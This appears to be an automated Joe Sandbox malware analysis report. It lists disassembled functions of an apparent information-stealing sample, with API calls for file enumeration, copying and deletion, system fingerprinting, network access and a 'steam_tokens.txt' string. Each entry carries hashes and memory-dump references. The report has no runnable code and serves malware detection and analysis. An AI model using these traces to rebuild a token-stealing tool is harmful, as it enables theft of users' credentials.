Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 10fbe9eb2742df883d3b203e3e4fd63634fe2657fb2e0349a2fcbdd6249fe704
Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
Opcode Fuzzy Hash: 10fbe9eb2742df883d3b203e3e4fd63634fe2657fb2e0349a2fcbdd6249fe704
Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,02F618C0), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,02F618E0), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,02F61930), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 8882f6fc2c5f91f777fc6c73b58a887527dd2ea75ec50127e14f13b7a0b7f144
Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
Opcode Fuzzy Hash: 8882f6fc2c5f91f777fc6c73b58a887527dd2ea75ec50127e14f13b7a0b7f144
Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,02F618C0), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,02F618E0), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,02F61930), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 0d0c0eac2fe3718911e5f0e7565b39900880d399f84bae414dc93f0ff5e2b373
Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
Opcode Fuzzy Hash: 0d0c0eac2fe3718911e5f0e7565b39900880d399f84bae414dc93f0ff5e2b373
Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 0041281A
lstrcat.KERNEL32(?,02F65BF0), ref: 00412838

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
Part of subcall function 00412570: lstrcat.KERNEL32(?,02F61C20), ref: 0041269B
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B

Strings

00A, xrefs: 0041285C, 0041288B, 004128BB, 004128EA, 0041291A, 00412949, 0041296B, 0041285F, 0041288E, 004128BE, 004128ED, 0041291D, 0041294C

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 00A
API String ID: 2104210347-95910775
Opcode ID: 9c7f13206ddda485729eac7f28efb50ea8b0b3f2be96dd1d0bc30849c0ab3237
Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
Opcode Fuzzy Hash: 9c7f13206ddda485729eac7f28efb50ea8b0b3f2be96dd1d0bc30849c0ab3237
Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9

Uniqueness

Uniqueness Score: -1.00%

Function 6C003060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C003095

Part of subcall function 6C0035A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C08F688,00001000), ref: 6C0035D5
Part of subcall function 6C0035A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0035E0
Part of subcall function 6C0035A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C0035FD
Part of subcall function 6C0035A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C00363F
Part of subcall function 6C0035A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C00369F
Part of subcall function 6C0035A0: __aulldiv.LIBCMT ref: 6C0036E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C00309F

Part of subcall function 6C025B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0256EE,?,00000001), ref: 6C025B85
Part of subcall function 6C025B50: EnterCriticalSection.KERNEL32(6C08F688,?,?,?,6C0256EE,?,00000001), ref: 6C025B90
Part of subcall function 6C025B50: LeaveCriticalSection.KERNEL32(6C08F688,?,?,?,6C0256EE,?,00000001), ref: 6C025BD8
Part of subcall function 6C025B50: GetTickCount64.KERNEL32 ref: 6C025BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C0030BE

Part of subcall function 6C0030F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C003127
Part of subcall function 6C0030F0: __aulldiv.LIBCMT ref: 6C003140

Part of subcall function 6C03AB2A: __onexit.LIBCMT ref: 6C03AB30

Memory Dump Source

Source File: 00000001.00000002.2117587062.000000006C001000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C000000, based on PE: true

Associated: 00000001.00000002.2117549990.000000006C000000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2117761371.000000006C08E000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2117799562.000000006C092000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c000000_u42w.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: b2d24d5d1c5d6a8cdf31aa4b89cfdd125829c749aa3d9db5aaf09d7a71364d7c
Instruction ID: 171eeda8ed4c0abd827f77dae4d62d3ae4eb7f03700e4a6a38ec350be63d1d3b
Opcode Fuzzy Hash: b2d24d5d1c5d6a8cdf31aa4b89cfdd125829c749aa3d9db5aaf09d7a71364d7c
Instruction Fuzzy Hash: 7CF0F922E21B4496DF10DF7488417E673BCAF6F214F619719E84857661FF2071E88386

Uniqueness

Uniqueness Score: -1.00%

Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
CloseHandle.KERNEL32(00000000), ref: 00415BAF

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 56d175405612ec99222efaf63e762c64211d34bef79246e5213ab755cd92519f
Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
Opcode Fuzzy Hash: 56d175405612ec99222efaf63e762c64211d34bef79246e5213ab755cd92519f
Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
HeapAlloc.KERNEL32(00000000), ref: 00414414
GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
ExitProcess.KERNEL32 ref: 00401103

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Uniqueness

Uniqueness Score: -1.00%

Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004119C8

Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680

strtok_s.MSVCRT ref: 00411A4D

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9

Strings

steam_tokens.txt, xrefs: 00412B6F

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: f13294520ed57f92bb5a91e58b27683597a8e94919879bdb8405eaded5635e50
Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
Opcode Fuzzy Hash: f13294520ed57f92bb5a91e58b27683597a8e94919879bdb8405eaded5635e50
Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147CD
wsprintfA.USER32 ref: 004147E3

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B190
lstrlen.KERNEL32(00000000), ref: 0040B1A4

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: 49d430109ed41839407466bb64c8611e6235bdcf2bd12599c945c9a693aa8f51
Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
Opcode Fuzzy Hash: 49d430109ed41839407466bb64c8611e6235bdcf2bd12599c945c9a693aa8f51
Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040A95A
lstrlen.KERNEL32(00000000), ref: 0040A96E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 4e11729e46e31e3c97c3248b6f3b977cbce3450fd405f5926df3b654293f7180
Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
Opcode Fuzzy Hash: 4e11729e46e31e3c97c3248b6f3b977cbce3450fd405f5926df3b654293f7180
Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040AC1E
lstrlen.KERNEL32(00000000), ref: 0040AC32

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: d0d12244e56377dad6549dc747312b04261d8f8a8838afc4123c2bb567b5df39
Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
Opcode Fuzzy Hash: d0d12244e56377dad6549dc747312b04261d8f8a8838afc4123c2bb567b5df39
Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
